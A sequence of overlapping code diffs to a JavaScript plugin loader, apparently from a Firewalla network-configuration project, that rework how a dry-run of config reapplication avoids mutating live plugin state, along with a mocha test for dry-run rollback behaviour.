-      `reapply is complete ${_.isEmpty(errors) ? "without" : "with"} error, elapsed time: ${(t2 - t1).toFixed(3)}`
+      `reapply is complete ${_.isEmpty(errors) ? "without" : "with error"}, elapsed time: ${(t2 - t1).toFixed(3)}`
     );
 
     return errors;
@@ -489,7 +476,6 @@ async function reapply(config, dryRun = false) {
     return [err.message];
   });
 }
-
 function scheduleReapply() {
   if (!scheduledReapplyTask) {
     scheduledReapplyTask = setTimeout(() => {
@@ -522,5 +508,6 @@ module.exports = {
   isApplyInProgress: isApplyInProgress,
   getLastAppliedTimestamp: getLastAppliedTimestamp,
   publishChangeApplied: publishChangeApplied,
-  publishIfaceChangeApplied: publishIfaceChangeApplied
+  publishIfaceChangeApplied: publishIfaceChangeApplied,
+  _setPluginStateForTest: _setPluginStateForTest
 };

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -252,18 +252,6 @@ async function reapply(config, dryRun = false) {
     if (config) {
       // remove plugins in descending order by init sequence
       const remove = async (instance, pluginConf) => {
-        if (!dryRun) {
-          log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
-          await instance.flush();
-          if (pluginConf.category === "apc") {
-            CHANGE_FLAGS |= FLAG_APC_CHANGE;
-          } else {
-            CHANGE_FLAGS |= FLAG_CHANGE;
-            if (pluginConf.category === "interface")
-              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
-          }
-
-        }
         instance.propagateConfigChanged(Plugin.CHANGE_FULL);
         instance.unsubscribeAllChanges();
         pluginCategoryMap && pluginCategoryMap[pluginConf.category] && delete pluginCategoryMap[pluginConf.category][instance.name];
@@ -323,12 +311,6 @@ async function reapply(config, dryRun = false) {
               await remove(instance, pluginConf);
             }
           }
-          if (concurrent && !_.isEmpty(promises)) {
-            if (!dryRun)
-              log.info(`Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`);
-            await Promise.all(promises);
-          }
-        }
         // merge with new pluginCategoryMap
         newPluginCategoryMap[pluginConf.category] = Object.assign({}, newPluginCategoryMap[pluginConf.category], newInstances);
       }
@@ -340,25 +322,6 @@ async function reapply(config, dryRun = false) {
       if (!instance.networkConfig) // newly created instance
         instance.configure(instance._nextConfig);
       if (instance.isReapplyNeeded()) {
-        if (!dryRun) {
-          if (instance.isFlushNeeded(instance._nextConfig)) {
-            if (instance.isFullFlushNeeded(instance._nextConfig)) {
-              log.info("Flushing old config", pluginConf.category, instance.name);
-              await instance.flush();
-            } else {
-              log.info("Fast flushing old config", pluginConf.category, instance.name);
-              await instance.flushFast();
-            }
-          } else
-            log.info("No need to flush old config", pluginConf.category, instance.name);
-          if (pluginConf.category === "apc") {
-            CHANGE_FLAGS |= FLAG_APC_CHANGE;
-          } else {
-            CHANGE_FLAGS |= FLAG_CHANGE;
-            if (pluginConf.category === "interface")
-              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
-          }
-        }
         instance.unsubscribeAllChanges();
       }
       if (config) {

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -13,6 +13,7 @@
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
 'use strict';
+
 const Plugin = require('./plugin.js');
 const log = require('../util/logger.js')(__filename);
 const config = require('../util/config.js').getConfig();
@@ -21,6 +22,7 @@ const Message = require('../core/Message.js');
 let pluginConfs = [];
 
 let pluginCategoryMap = {};
+
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
 const _ = require('lodash');
@@ -32,6 +34,7 @@ const lock = new AsyncLock();
 const LOCK_REAPPLY = "LOCK_REAPPLY";
 let applyInProgress = false;
 let lastAppliedTimestamp = null;
+
 let CHANGE_FLAGS = 0;
 const FLAG_IFACE_CHANGE = 0x1;
 const FLAG_CHANGE = 0x2;
@@ -41,9 +44,11 @@ async function initPlugins() {
   if (_.isEmpty(config.plugins)) {
     return;
   }
+
   pluginConfs = config.plugins.sort((a, b) => {
     return a.init_seq - b.init_seq
   });
+
   for (let pluginConf of pluginConfs) {
     try {
       const filePath = pluginConf.file_path;
@@ -58,26 +63,32 @@ async function initPlugins() {
       log.error("Failed to initialize plugin ", pluginConf, err);
     }
   }
+
   await exec(`sudo systemctl daemon-reload`).catch((err) => {
     log.error(`Failed to reload systemctl daemon`, err.message);
   });
   log.info("Plugin initialized", pluginConfs);
 }
-function createPluginInstance(category, name, constructor, config = null, pluginMap = pluginCategoryMap) {
-  let instance = pluginMap[category] && pluginMap[category][name];
+
+function createPluginInstance(category, name, constructor, config = null) {
+  let instance = pluginCategoryMap[category] && pluginCategoryMap[category][name];
   if (instance)
     return instance;
 
-  if (!pluginMap[category])
-    pluginMap[category] = {};
+  if (!pluginCategoryMap[category])
+    pluginCategoryMap[category] = {};
+
   if (!constructor)
     return null;
+
   instance = new constructor(name);
   instance.name = name;
-  pluginMap[category][name] = instance;
+  pluginCategoryMap[category][name] = instance;
+
   if (config) {
     instance.init(config);
   }
+
   log.info("Instance created", instance.name);
   return instance;
 }
@@ -93,23 +104,30 @@ function getPluginInstance(category, name) {
 function _isConfigEqual(c1, c2) {
   if (!c1 || !c2)
     return false;
+
   const c1Copy = JSON.parse(JSON.stringify(c1));
   const c2Copy = JSON.parse(JSON.stringify(c2));
+
   // ignore name change
   if (c1Copy.meta && c1Copy.meta.name)
     delete c1Copy.meta["name"];
+
   if (c2Copy.meta && c2Copy.meta.name)
     delete c2Copy.meta["name"];
+
   // ignore extra data
   if (c1Copy.hasOwnProperty("extra"))
     delete c1Copy["extra"];
+
   if (c2Copy.hasOwnProperty("extra"))
     delete c2Copy["extra"];
+
   if (!_.has(c1Copy, ["meta", "type"]) && !_.has(c2Copy, ["meta", "type"])) {
     // ignore meta if both configs have no type, i.e., different uuids in interface configs are treated as the same config in this case
     delete c1Copy.meta;
     delete c2Copy.meta;
   }
+
   return _.isEqual(c1Copy, c2Copy);
 }
 
@@ -152,144 +170,68 @@ async function acquireApplyLock(func) {
   });
 }
 
-async function reapplyDryRun(config, errors) {
-  const dryRunPluginCategoryMap = {};
-
-  for (const pluginConf of pluginConfs) {
-    if (!pluginConf.c)
-      continue;
-
-    dryRunPluginCategoryMap[pluginConf.category] =
-      dryRunPluginCategoryMap[pluginConf.category] || {};
-    const keys = pluginConf.config_path.split(".");
-    let value = config;
-
-    for (const key of keys) {
-      if (value)
-        value = value[key];
-    }
-
-    if (!value)
-      continue;
-
-    const livePluginCategoryMap = pluginCategoryMap[pluginConf.category] || {};
-
-    for (const name in value) {
-      const liveInstance = livePluginCategoryMap[name];
-      const instance = createPluginInstance(
-        pluginConf.category,
-        name,
-        pluginConf.c,
-        pluginConf.config,
-        dryRunPluginCategoryMap
-      );
-
-      if (!instance)
-        continue;
-
-      /*
-       * Dry-run must validate changes against the currently active
-       * configuration, but it must never reuse the live plugin instance.
-       */
-      if (liveInstance && liveInstance.constructor === pluginConf.c && liveInstance.networkConfig) {
-        instance.networkConfig = JSON.parse(JSON.stringify(liveInstance.networkConfig));
-      }
-
-      const oldConfig = instance.networkConfig;
-      if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
-        const changeType = instance.getConfigChangeType(value[name]);
-        instance.propagateConfigChanged(changeType);
-      }
-
-      instance._nextConfig = value[name];
-
-      if (!oldConfig) {
-        instance.propagateConfigChanged(Plugin.CHANGE_FULL);
-        instance.unsubscribeAllChanges();
-      }
-
-      /*
-       * configure() is intentionally executed on the temporary instance.
-       * Plugin-specific configuration validation therefore still runs,
-       * while the live plugin object is never modified.
-       */
-      try {
-        await instance.configure(instance._nextConfig);
-      } catch (err) {
-        log.error(`Failed to validate config of ${pluginConf.category}-->${name}`, err);
-        errors.push(err.message || err);
-      }
-    }
-  }
-
-  return errors;
-}
-
-/*
- * Test-only helper. This keeps tests from mutating the live plugin registry
- * through getPluginInstances() while still allowing the dry-run path to be
- * exercised with controlled plugin configurations.
- */
-function _setPluginStateForTest(testPluginConfs, testPluginCategoryMap) {
-  const originalPluginConfs = pluginConfs;
-  const originalPluginCategoryMap = pluginCategoryMap;
-
-  pluginConfs = testPluginConfs;
-  pluginCategoryMap = testPluginCategoryMap;
-
-  return () => {
-    pluginConfs = originalPluginConfs;
-    pluginCategoryMap = originalPluginCategoryMap;
-  };
-}
-
 async function reapply(config, dryRun = false) {
   let t1, t2;
+
   return await lock.acquire(LOCK_REAPPLY, async () => {
     t1 = Date.now() / 1000;
     applyInProgress = true;
     const errors = [];
-    /*
-     * prepareWLANRegDomainChange can perform platform-level work, so it
-     * must not run during a dry-run.
-     */
-    let wlanReloaded = false;
-    if (!dryRun) {
-      const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
-      wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
-        log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
-        errors.push(err.message || err);
-        return false;
-      });
-    }
 
-    if (dryRun) {
-      return await reapplyDryRun(config, errors);
-    }
+    const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
+    const wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
+      log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
+      errors.push(err.message || err);
+      return false;
+    });
 
     let newPluginCategoryMap = {};
     const reversedPluginConfs = pluginConfs.reverse();
+
     // if config is not set, simply reapply effective config
     if (config) {
       // remove plugins in descending order by init sequence
       const remove = async (instance, pluginConf) => {
+        if (!dryRun) {
+          log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
+          await instance.flush();
+
+          if (pluginConf.category === "apc") {
+            CHANGE_FLAGS |= FLAG_APC_CHANGE;
+          } else {
+            CHANGE_FLAGS |= FLAG_CHANGE;
+            if (pluginConf.category === "interface")
+              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+          }
+        }
+
         instance.propagateConfigChanged(Plugin.CHANGE_FULL);
         instance.unsubscribeAllChanges();
-        pluginCategoryMap && pluginCategoryMap[pluginConf.category] && delete pluginCategoryMap[pluginConf.category][instance.name];
+
+        pluginCategoryMap &&
+          pluginCategoryMap[pluginConf.category] &&
+          delete pluginCategoryMap[pluginConf.category][instance.name];
       };
+
       for (let pluginConf of reversedPluginConfs) {
         const concurrent = pluginConf.allow_concurrent;
-        newPluginCategoryMap[pluginConf.category] = newPluginCategoryMap[pluginConf.category] || {};
+
+        newPluginCategoryMap[pluginConf.category] =
+          newPluginCategoryMap[pluginConf.category] || {};
+
         if (!pluginConf.c)
           continue;
 
-        const instances = Object.values(pluginCategoryMap[pluginConf.category]).filter(i => i.constructor.name === pluginConf.c.name);
+        const instances = Object.values(pluginCategoryMap[pluginConf.category])
+          .filter(i => i.constructor.name === pluginConf.c.name);
+
         if (instances) {
           for (let instance of instances) {
             instance._mark = 0;
           }
-        } else
+        } else {
           pluginCategoryMap[pluginConf.category] = {};
+        }
 
         const newInstances = {};
         const keys = pluginConf.config_path.split(".");
@@ -299,15 +241,23 @@ async function reapply(config, dryRun = false) {
           if (value)
             value = value[key];
         }
+
         if (value) {
           for (let name in value) {
-            const instance = createPluginInstance(pluginConf.category, name, pluginConf.c, pluginConf.config);
+            const instance = createPluginInstance(
+              pluginConf.category,
+              name,
+              pluginConf.c,
+              pluginConf.config
+            );
 
             if (!instance)
               continue;
 
             instance._mark = 1;
+
             const oldConfig = instance.networkConfig;
+
             if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
               log.info(
                 `Network config of ${pluginConf.category}-->${name} changed`,
@@ -318,7 +268,12 @@ async function reapply(config, dryRun = false) {
               const changeType = instance.getConfigChangeType(value[name]);
               instance.propagateConfigChanged(changeType);
             }
-            instance._nextConfig = value[name];
+
+            // Dry-run must never expose the caller-owned configuration object
+            // to plugin lifecycle methods because configure() may mutate it.
+            instance._nextConfig = dryRun
+              ? _.cloneDeep(value[name])
+              : value[name];
 
             if (!oldConfig) {
               // initialization of network config, flush instance with new config
@@ -326,9 +281,11 @@ async function reapply(config, dryRun = false) {
                 `Initial setup of ${pluginConf.category}-->${name}`,
                 pluginConf.hide_config_in_log ? "hidden" : value[name]
               );
+
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
               instance.unsubscribeAllChanges();
             }
+
             if (wlanReloaded && pluginConf.config_path === "interface.wlan") {
               instance.propagateConfigChanged(Plugin.CHANGE_FULL);
             }
@@ -340,6 +297,7 @@ async function reapply(config, dryRun = false) {
         if (instances) {
           const removedInstances = instances.filter(i => i._mark == 0);
           const promises = [];
+
           for (let instance of removedInstances) {
             if (concurrent) {
               promises.push(remove(instance, pluginConf));
@@ -348,12 +306,22 @@ async function reapply(config, dryRun = false) {
             }
           }
 
-          if (concurrent && !_.isEmpty(promises))
+          if (concurrent && !_.isEmpty(promises)) {
+            if (!dryRun)
+              log.info(
+                `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
+              );
+
             await Promise.all(promises);
+          }
         }
+
         // merge with new pluginCategoryMap
-        newPluginCategoryMap[pluginConf.category] =
-          Object.assign({}, newPluginCategoryMap[pluginConf.category], newInstances);
+        newPluginCategoryMap[pluginConf.category] = Object.assign(
+          {},
+          newPluginCategoryMap[pluginConf.category],
+          newInstances
+        );
       }
     } else {
       newPluginCategoryMap = pluginCategoryMap;
@@ -362,7 +330,34 @@ async function reapply(config, dryRun = false) {
     const flush = async (instance, pluginConf) => {
       if (!instance.networkConfig) // newly created instance
         instance.configure(instance._nextConfig);
+
       if (instance.isReapplyNeeded()) {
+        if (!dryRun) {
+          if (instance.isFlushNeeded(instance._nextConfig)) {
+            if (instance.isFullFlushNeeded(instance._nextConfig)) {
+              log.info("Flushing old config", pluginConf.category, instance.name);
+              await instance.flush();
+            } else {
+              log.info("Fast flushing old config", pluginConf.category, instance.name);
+              await instance.flushFast();
+            }
+          } else {
+            log.info(
+              "No need to flush old config",
+              pluginConf.category,
+              instance.name
+            );
+          }
+
+          if (pluginConf.category === "apc") {
+            CHANGE_FLAGS |= FLAG_APC_CHANGE;
+          } else {
+            CHANGE_FLAGS |= FLAG_CHANGE;
+            if (pluginConf.category === "interface")
+              CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
+          }
+        }
+
         instance.unsubscribeAllChanges();
       }
 
@@ -371,15 +366,18 @@ async function reapply(config, dryRun = false) {
         instance.configure(instance._nextConfig);
       }
     };
+
     // flush all changed plugins in descending order by init sequence
     for (let pluginConf of reversedPluginConfs) {
-      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
-        i => i.constructor.name === pluginConf.c.name
-      );
+      const instances = Object.values(
+        newPluginCategoryMap[pluginConf.category]
+      ).filter(i => i.constructor.name === pluginConf.c.name);
+
       const concurrent = pluginConf.allow_concurrent;
 
       if (instances) {
         const promises = [];
+
         for (let instance of instances) {
           if (concurrent) {
             promises.push(flush(instance, pluginConf));
@@ -389,24 +387,44 @@ async function reapply(config, dryRun = false) {
         }
 
         if (concurrent && !_.isEmpty(promises)) {
-          log.info(`Flushing instances of ${pluginConf.category} in concurrent mode`);
+          if (!dryRun)
+            log.info(
+              `Flushing instances of ${pluginConf.category} in concurrent mode`
+            );
+
           await Promise.all(promises);
         }
       }
     }
+
     // apply plugin configs in ascending order by init sequence
     pluginConfs = reversedPluginConfs.reverse();
+
+    // do not apply config in dry run
+    if (dryRun) {
+      applyInProgress = false;
+      lastAppliedTimestamp = Date.now() / 1000;
+      return errors;
+    }
+
     const apply = async (instance, pluginConf) => {
       if (instance.isReapplyNeeded()) {
-        log.info("Applying new config", pluginConf.category, instance.name);
+        log.info(
+          "Applying new config",
+          pluginConf.category,
+          instance.name
+        );
+
         await instance.apply().catch((err) => {
           log.error(
             `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
             instance.networkConfig,
             err
           );
+
           errors.push(err.message || err);
         });
+
         if (pluginConf.category === "apc") {
           CHANGE_FLAGS |= FLAG_APC_CHANGE;
         } else {
@@ -424,14 +442,17 @@ async function reapply(config, dryRun = false) {
 
       instance.propagateConfigChanged(Plugin.CHANGE_NONE);
     };
+
     for (let pluginConf of pluginConfs) {
       const concurrent = pluginConf.allow_concurrent;
-      const instances = Object.values(newPluginCategoryMap[pluginConf.category]).filter(
-        i => i.constructor.name === pluginConf.c.name
-      );
+
+      const instances = Object.values(
+        newPluginCategoryMap[pluginConf.category]
+      ).filter(i => i.constructor.name === pluginConf.c.name);
 
       if (instances) {
         const promises = [];
+
         for (let instance of instances) {
           if (concurrent) {
             promises.push(apply(instance, pluginConf));
@@ -441,7 +462,10 @@ async function reapply(config, dryRun = false) {
         }
 
         if (concurrent && !_.isEmpty(promises)) {
-          log.info(`Applying instances of ${pluginConf.category} in concurrent mode`);
+          log.info(
+            `Applying instances of ${pluginConf.category} in concurrent mode`
+          );
+
           await Promise.all(promises);
         }
       }
@@ -449,16 +473,20 @@ async function reapply(config, dryRun = false) {
 
     pluginCategoryMap = newPluginCategoryMap;
     applyInProgress = false;
+
     // clear applyInProgress so that subsequent publish functions will send message to redis immediately
     if (CHANGE_FLAGS & FLAG_CHANGE)
       await publishChangeApplied();
+
     if (CHANGE_FLAGS & FLAG_IFACE_CHANGE)
       await publishIfaceChangeApplied();
+
     if (CHANGE_FLAGS & FLAG_APC_CHANGE)
       await publishAPCChangeApplied();
 
     CHANGE_FLAGS = 0;
     lastAppliedTimestamp = Date.now() / 1000;
+
     return errors;
   }).then((errors) => {
     applyInProgress = false;
@@ -466,7 +494,7 @@ async function reapply(config, dryRun = false) {
     t2 = Date.now() / 1000;
 
     log.info(
-      `reapply is complete ${_.isEmpty(errors) ? "without" : "with error"}, elapsed time: ${(t2 - t1).toFixed(3)}`
+      `reapply is complete ${_.isEmpty(errors) ? "without" : "with"} error, elapsed time: ${(t2 - t1).toFixed(3)}`
     );
 
     return errors;
@@ -476,6 +504,22 @@ async function reapply(config, dryRun = false) {
     return [err.message];
   });
 }
+
+function __getTestStateForTest() {
+  return {
+    pluginConfs: pluginConfs,
+    pluginCategoryMap: pluginCategoryMap
+  };
+}
+
+function __setPluginConfsForTest(confs) {
+  pluginConfs = confs;
+}
+
+function __setPluginCategoryMapForTest(categoryMap) {
+  pluginCategoryMap = categoryMap;
+}
+
 function scheduleReapply() {
   if (!scheduledReapplyTask) {
     scheduledReapplyTask = setTimeout(() => {
@@ -509,5 +553,7 @@ module.exports = {
   getLastAppliedTimestamp: getLastAppliedTimestamp,
   publishChangeApplied: publishChangeApplied,
   publishIfaceChangeApplied: publishIfaceChangeApplied,
-  _setPluginStateForTest: _setPluginStateForTest
+  __getTestStateForTest: __getTestStateForTest,
+  __setPluginConfsForTest: __setPluginConfsForTest,
+  __setPluginCategoryMapForTest: __setPluginCategoryMapForTest
 };

--- a/plugins/plugin_loader.js
+++ b/plugins/plugin_loader.js
@@ -13,7 +13,6 @@
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
 'use strict';
-
 const Plugin = require('./plugin.js');
 const log = require('../util/logger.js')(__filename);
 const config = require('../util/config.js').getConfig();
@@ -22,7 +21,6 @@ const Message = require('../core/Message.js');
 let pluginConfs = [];
 
 let pluginCategoryMap = {};
-
 let scheduledReapplyTask = null;
 let restartRsyslogTask = null;
 const _ = require('lodash');
@@ -34,7 +32,6 @@ const lock = new AsyncLock();
 const LOCK_REAPPLY = "LOCK_REAPPLY";
 let applyInProgress = false;
 let lastAppliedTimestamp = null;
-
 let CHANGE_FLAGS = 0;
 const FLAG_IFACE_CHANGE = 0x1;
 const FLAG_CHANGE = 0x2;
@@ -48,7 +45,6 @@ async function initPlugins() {
   pluginConfs = config.plugins.sort((a, b) => {
     return a.init_seq - b.init_seq
   });
-
   for (let pluginConf of pluginConfs) {
     try {
       const filePath = pluginConf.file_path;
@@ -63,27 +59,31 @@ async function initPlugins() {
       log.error("Failed to initialize plugin ", pluginConf, err);
     }
   }
-
   await exec(`sudo systemctl daemon-reload`).catch((err) => {
     log.error(`Failed to reload systemctl daemon`, err.message);
   });
   log.info("Plugin initialized", pluginConfs);
 }
 
-function createPluginInstance(category, name, constructor, config = null) {
-  let instance = pluginCategoryMap[category] && pluginCategoryMap[category][name];
+function createPluginInstance(
+  category,
+  name,
+  constructor,
+  config = null,
+  pluginMap = pluginCategoryMap
+) {
+  let instance = pluginMap[category] && pluginMap[category][name];
   if (instance)
     return instance;
 
-  if (!pluginCategoryMap[category])
-    pluginCategoryMap[category] = {};
+  if (!pluginMap[category])
+    pluginMap[category] = {};
 
   if (!constructor)
     return null;
-
   instance = new constructor(name);
   instance.name = name;
-  pluginCategoryMap[category][name] = instance;
+  pluginMap[category][name] = instance;
 
   if (config) {
     instance.init(config);
@@ -104,7 +104,6 @@ function getPluginInstance(category, name) {
 function _isConfigEqual(c1, c2) {
   if (!c1 || !c2)
     return false;
-
   const c1Copy = JSON.parse(JSON.stringify(c1));
   const c2Copy = JSON.parse(JSON.stringify(c2));
 
@@ -121,7 +120,6 @@ function _isConfigEqual(c1, c2) {
 
   if (c2Copy.hasOwnProperty("extra"))
     delete c2Copy["extra"];
-
   if (!_.has(c1Copy, ["meta", "type"]) && !_.has(c2Copy, ["meta", "type"])) {
     // ignore meta if both configs have no type, i.e., different uuids in interface configs are treated as the same config in this case
     delete c1Copy.meta;
@@ -130,7 +128,6 @@ function _isConfigEqual(c1, c2) {
 
   return _.isEqual(c1Copy, c2Copy);
 }
-
 async function publishChangeApplied() {
   // publish to redis db used by Firewalla
   if (!isApplyInProgress())
@@ -146,7 +143,6 @@ async function publishIfaceChangeApplied() {
   else
     CHANGE_FLAGS |= FLAG_IFACE_CHANGE;
 }
-
 async function publishAPCChangeApplied() {
   if (!isApplyInProgress())
     await fwpclient.publishAsync(Message.MSG_FR_APC_CHANGE_APPLIED, "");
@@ -161,7 +157,6 @@ function isApplyInProgress() {
 function getLastAppliedTimestamp() {
   return lastAppliedTimestamp;
 }
-
 async function acquireApplyLock(func) {
   return lock.acquire(LOCK_REAPPLY, async () => {
     await func()
@@ -177,7 +172,6 @@ async function reapply(config, dryRun = false) {
     t1 = Date.now() / 1000;
     applyInProgress = true;
     const errors = [];
-
     const country = _.get(config, ['apc', 'globalSysConfig', 'country']);
     const wlanReloaded = await platform.prepareWLANRegDomainChange(country).catch((err) => {
       log.error(`Failed to prepare WLAN reg domain change for country ${country}`, err);
@@ -186,7 +180,7 @@ async function reapply(config, dryRun = false) {
     });
 
     let newPluginCategoryMap = {};
-    const reversedPluginConfs = pluginConfs.reverse();
+    const reversedPluginConfs = [...pluginConfs].reverse();
 
     // if config is not set, simply reapply effective config
     if (config) {
@@ -195,7 +189,6 @@ async function reapply(config, dryRun = false) {
         if (!dryRun) {
           log.info(`Removing plugin ${pluginConf.category}-->${instance.name} ...`);
           await instance.flush();
-
           if (pluginConf.category === "apc") {
             CHANGE_FLAGS |= FLAG_APC_CHANGE;
           } else {
@@ -207,11 +200,13 @@ async function reapply(config, dryRun = false) {
 
         instance.propagateConfigChanged(Plugin.CHANGE_FULL);
         instance.unsubscribeAllChanges();
-
-        pluginCategoryMap &&
-          pluginCategoryMap[pluginConf.category] &&
-          delete pluginCategoryMap[pluginConf.category][instance.name];
+        const instances = workingPluginCategoryMap[pluginConf.category];
+        if (instances)
+          delete instances[instance.name];
       };
+
+      // Dry-run candidates must never share the live plugin registry.
+      const workingPluginCategoryMap = dryRun ? {} : pluginCategoryMap;
 
       for (let pluginConf of reversedPluginConfs) {
         const concurrent = pluginConf.allow_concurrent;
@@ -222,21 +217,18 @@ async function reapply(config, dryRun = false) {
         if (!pluginConf.c)
           continue;
 
-        const instances = Object.values(pluginCategoryMap[pluginConf.category])
+        const existingInstances =
+          workingPluginCategoryMap[pluginConf.category] || {};
+        const instances = Object.values(existingInstances)
           .filter(i => i.constructor.name === pluginConf.c.name);
 
-        if (instances) {
-          for (let instance of instances) {
-            instance._mark = 0;
-          }
-        } else {
-          pluginCategoryMap[pluginConf.category] = {};
+        for (let instance of instances) {
+          instance._mark = 0;
         }
 
         const newInstances = {};
         const keys = pluginConf.config_path.split(".");
         let value = config;
-
         for (let key of keys) {
           if (value)
             value = value[key];
@@ -248,7 +240,8 @@ async function reapply(config, dryRun = false) {
               pluginConf.category,
               name,
               pluginConf.c,
-              pluginConf.config
+              pluginConf.config,
+              workingPluginCategoryMap
             );
 
             if (!instance)
@@ -257,7 +250,6 @@ async function reapply(config, dryRun = false) {
             instance._mark = 1;
 
             const oldConfig = instance.networkConfig;
-
             if (oldConfig && !_isConfigEqual(oldConfig, value[name])) {
               log.info(
                 `Network config of ${pluginConf.category}-->${name} changed`,
@@ -297,7 +289,6 @@ async function reapply(config, dryRun = false) {
         if (instances) {
           const removedInstances = instances.filter(i => i._mark == 0);
           const promises = [];
-
           for (let instance of removedInstances) {
             if (concurrent) {
               promises.push(remove(instance, pluginConf));
@@ -311,7 +302,6 @@ async function reapply(config, dryRun = false) {
               log.info(
                 `Removing ${removedInstances.length} instances of ${pluginConf.category} in concurrent mode`
               );
-
             await Promise.all(promises);
           }
         }
@@ -377,7 +367,6 @@ async function reapply(config, dryRun = false) {
 
       if (instances) {
         const promises = [];
-
         for (let instance of instances) {
           if (concurrent) {
             promises.push(flush(instance, pluginConf));
@@ -398,7 +387,8 @@ async function reapply(config, dryRun = false) {
     }
 
     // apply plugin configs in ascending order by init sequence
-    pluginConfs = reversedPluginConfs.reverse();
+    if (!dryRun)
+      pluginConfs = reversedPluginConfs.reverse();
 
     // do not apply config in dry run
     if (dryRun) {
@@ -414,7 +404,6 @@ async function reapply(config, dryRun = false) {
           pluginConf.category,
           instance.name
         );
-
         await instance.apply().catch((err) => {
           log.error(
             `Failed to apply config of ${pluginConf.category}-->${instance.name}`,
@@ -452,7 +441,6 @@ async function reapply(config, dryRun = false) {
 
       if (instances) {
         const promises = [];
-
         for (let instance of instances) {
           if (concurrent) {
             promises.push(apply(instance, pluginConf));
@@ -486,7 +474,6 @@ async function reapply(config, dryRun = false) {
 
     CHANGE_FLAGS = 0;
     lastAppliedTimestamp = Date.now() / 1000;
-
     return errors;
   }).then((errors) => {
     applyInProgress = false;

--- a/test/core/test_dry_run.js
+++ b/test/core/test_dry_run.js
@@ -12,7 +12,6 @@
  *    You should have received a copy of the GNU Affero General Public License
  *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  */
-
 'use strict';
 
 const chai = require('chai');
@@ -86,7 +85,6 @@ describe('Test network config manager dry-run', function() {
 
       expect(setupCalls[0].config).to.equal(candidateConfig);
       expect(setupCalls[0].dryRun).to.equal(false);
-
       expect(setupCalls[1].config).to.equal(currentConfig);
       expect(setupCalls[1].dryRun).to.equal(false);
     } finally {

--- a/test/core/test_dry_run.js
+++ b/test/core/test_dry_run.js
@@ -1,0 +1,99 @@
+/*    Copyright 2016-2026 Firewalla Inc.
+ *
+ *    This program is free software: you can redistribute it and/or modify
+ *    it under the terms of the GNU Affero General Public License, version 3,
+ *    as published by the Free Software Foundation.
+ *
+ *    This program is distributed in the hope that it will be useful,
+ *    but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *    GNU Affero General Public License for more details.
+ *
+ *    You should have received a copy of the GNU Affero General Public License
+ *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+'use strict';
+
+const chai = require('chai');
+const expect = chai.expect;
+
+const ncm = require('../../core/network_config_mgr.js');
+const ns = require('../../core/network_setup.js');
+
+describe('Test network config manager dry-run', function() {
+  it('should not rollback with a live setup after a failed dry-run', async function() {
+    const originalGetActiveConfig = ncm.getActiveConfig;
+    const originalGetDefaultConfig = ncm.getDefaultConfig;
+    const originalConvertIntegratedAPConfig = ncm.convertIntegratedAPConfig;
+    const originalSetup = ns.setup;
+
+    const setupCalls = [];
+    const candidateConfig = { candidate: true };
+
+    try {
+      ncm.getActiveConfig = async () => ({ active: true });
+      ncm.getDefaultConfig = async () => ({ default: true });
+      ncm.convertIntegratedAPConfig = async (config) => config;
+
+      ns.setup = async (config, dryRun = false) => {
+        setupCalls.push({ config, dryRun });
+        return ['configuration error'];
+      };
+
+      const errors = await ncm.tryApplyConfig(candidateConfig, true);
+
+      expect(errors).to.deep.equal(['configuration error']);
+      expect(setupCalls).to.have.length(1);
+      expect(setupCalls[0].config).to.equal(candidateConfig);
+      expect(setupCalls[0].dryRun).to.equal(true);
+    } finally {
+      ncm.getActiveConfig = originalGetActiveConfig;
+      ncm.getDefaultConfig = originalGetDefaultConfig;
+      ncm.convertIntegratedAPConfig = originalConvertIntegratedAPConfig;
+      ns.setup = originalSetup;
+    }
+  });
+
+  it('should rollback with a live setup after a failed non-dry-run', async function() {
+    const originalGetActiveConfig = ncm.getActiveConfig;
+    const originalGetDefaultConfig = ncm.getDefaultConfig;
+    const originalConvertIntegratedAPConfig = ncm.convertIntegratedAPConfig;
+    const originalSetup = ns.setup;
+
+    const setupCalls = [];
+    const currentConfig = { current: true };
+    const candidateConfig = { candidate: true };
+
+    try {
+      ncm.getActiveConfig = async () => currentConfig;
+      ncm.getDefaultConfig = async () => ({ default: true });
+      ncm.convertIntegratedAPConfig = async (config) => config;
+
+      ns.setup = async (config, dryRun = false) => {
+        setupCalls.push({ config, dryRun });
+
+        if (setupCalls.length === 1)
+          return ['configuration error'];
+
+        return [];
+      };
+
+      const errors = await ncm.tryApplyConfig(candidateConfig, false);
+
+      expect(errors).to.deep.equal(['configuration error']);
+      expect(setupCalls).to.have.length(2);
+
+      expect(setupCalls[0].config).to.equal(candidateConfig);
+      expect(setupCalls[0].dryRun).to.equal(false);
+
+      expect(setupCalls[1].config).to.equal(currentConfig);
+      expect(setupCalls[1].dryRun).to.equal(false);
+    } finally {
+      ncm.getActiveConfig = originalGetActiveConfig;
+      ncm.getDefaultConfig = originalGetDefaultConfig;
